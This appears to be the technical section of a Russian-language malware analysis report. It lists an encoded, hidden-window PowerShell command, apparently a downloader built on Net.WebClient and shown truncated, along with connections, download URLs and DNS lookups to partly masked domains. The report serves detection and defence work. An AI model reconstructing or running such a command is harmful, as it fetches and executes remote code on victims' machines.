Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABTAF8ANAA3ADcAOAAzADIAPQAoACcAdgBfADYAOAAnACsAJwA3ACcAKwAnAF8AJwApADsAJABTADcAXwA1ADUANQBfAD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAHcANwA5AF8ANgA4ADgAPQAoAC...
- 'de####erforhad.com':80
- 'co###yres.com':80
- 'it##.#frn.edu.br':80
- http://de####erforhad.com/cgi-bin/EM7E/
- http://www.de####erforhad.com/cgi-bin/EM7E/
- http://co###yres.com/wordpress/wp-content/uploads/fWe/
- DNS ASK de####erforhad.com
- DNS ASK co###yres.com
- DNS ASK it##.#frn.edu.br
- DNS ASK ic####tikepppni.org
- DNS ASK ef##ur.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABTAF8ANAA3ADcAOAAzADIAPQAoACcAdgBfADYAOAAnACsAJwA3ACcAKwAnAF8AJwApADsAJABTADcAXwA1ADUANQBfAD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAHcANwA5AF8ANgA4ADgAPQAoAC...' (со скрытым окном)